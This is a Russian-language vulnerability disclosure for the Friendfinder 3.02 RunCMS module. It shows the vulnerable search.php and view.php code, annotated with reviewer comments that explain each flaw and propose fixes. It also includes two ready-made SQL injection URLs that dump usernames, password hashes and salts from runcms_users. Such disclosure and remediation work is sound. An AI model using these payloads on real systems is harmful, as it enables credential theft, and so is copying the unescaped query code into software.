Friendfinder
Версия: 3.02
Уязвимый скрипт: search.php
Запрос: /modules/friendfinder/search.php?page=search&search=search&agefrom=77&ag etill=19+union+select+1,uname,pwdsalt,4,0x31322e31 322e31393939,pass+from+runcms_users%23&sex=&partne r=&state=&category=&sort=
Уязвимый кусок кода:
PHP код:
// Reviewer note: both comparisons below use the bare word `search` rather than the
// string 'search'. PHP < 8 resolves an undefined constant to its own name with a
// notice; PHP 8 throws an Error here, so the intended form is $page == 'search'.
if ($page == search) {
if ($search == search) {
/************************/
// Pieces of the stored birth string, reassembled as YYYY.MM.DD for the date
// arithmetic below (the offsets suggest birth is stored as DD.MM.YYYY text — confirm
// against the schema).
$g="SUBSTRING(birth,7)";
$m="SUBSTRING(birth,4,2)";
$d="LEFT(birth,2)";
$dat="CONCAT($g,'.',$m,'.',$d)";
/************************/
// SQL injection: $agefrom and $agetill are interpolated unquoted into the BETWEEN
// clause, and $sex/$partner/$state/$category/$sort are interpolated inside
// single-quoted literals. All of them arrive from the query string (see the request
// above), presumably via register_globals. Mitigation: cast the two age bounds to
// int, escape/parameterise the string values through the db layer's quoting helper
// (its API is not shown here), and resolve $sort against a whitelist of column names.
// Note also that ORDER BY '$sort' is a quoted literal, which MySQL treats as a
// constant rather than a column reference, so it does not actually order the rows.
$sql = "SELECT id,user, city, state, birth, title FROM ".$db->prefix("friendfinder")."
inner join ".$db->prefix("friendfinder_state")."
on state = cid
WHERE (DATE_FORMAT(FROM_DAYS(TO_DAYS(NOW())-TO_DAYS($dat)), '%Y')+0) BETWEEN $agefrom AND $agetill AND partner='$sex' AND sex='$partner' AND state='$state' AND active='1' AND category='$category' ORDER BY '$sort'";
} else {
echo ""._TEXTSEARCHUNSUCCESSFUL."";
}
// Result table header; the cell labels are language constants.
echo "<table border=0 cellpadding=5 cellspacing=0 align=center width=550><tr><td><font face=arial size=2>"._UNAME."</td><br><td><font face=arial size=2>"._TEXTREGION."</td><td><font face=arial size=2>"._CITY."</td><td><font face=arial size=2>"._TEXTAGE."</td></tr>";
// $sql is only assigned in the if-branch above; when the else-branch ran, this still
// issues a query with an unset $sql.
$result = $db->query($sql);
// The loop body continues beyond this excerpt.
while (list($id,$user,$city,$state,$birth,$title ) = $db->fetch_row($result))
{
Уязвимый скрипт: view.php
Зависимость: magic_quotes = off
Запрос: /modules/friendfinder/view.php?id=-1'+union+select+1,uname,3,4,5,pass,7,8,9,pwdsalt,1 1,12,13,14,0x31322e31322e31393939,16,17,19,20,21,2 2+from+runcms_users%23
Уязвимый кусок кода:
PHP код:
// Reviewer note: with `||` the guard passes for any set $id regardless of its value,
// and an unset $id still reaches the right-hand comparison (undefined-variable
// notice); `&&` reads as the intended check.
if (isset($id) || $id != "")
{
// SQL injection: $id is interpolated straight from the request (see the query string
// above) into a single-quoted literal. The quotes only help while magic_quotes is
// escaping the quote character, which is why magic_quotes = off is listed as the
// prerequisite. Mitigation: cast $id to int if id is an integer column (likely, but
// confirm), or escape/parameterise it through the db layer's quoting helper.
$view = $db->query("SELECT id,user,active,sex,category,name,email,city,state,country,hobby,partner,height,weight,birth,pic,Description,imgname,imgtime,date, title FROM ".$db->prefix("friendfinder")."
inner join ".$db->prefix("friendfinder_state")." on state = cid WHERE id = '$id'");
// The loop body continues beyond this excerpt.
while (list($id,$user,$active,$sex,$category,$name,$email,$city,$state,$country,$hobby,$partner,$height,$weight,$birth,$pic,$Description,$imgname,$imgtime,$date,$title ) = $db->fetch_row($view)) {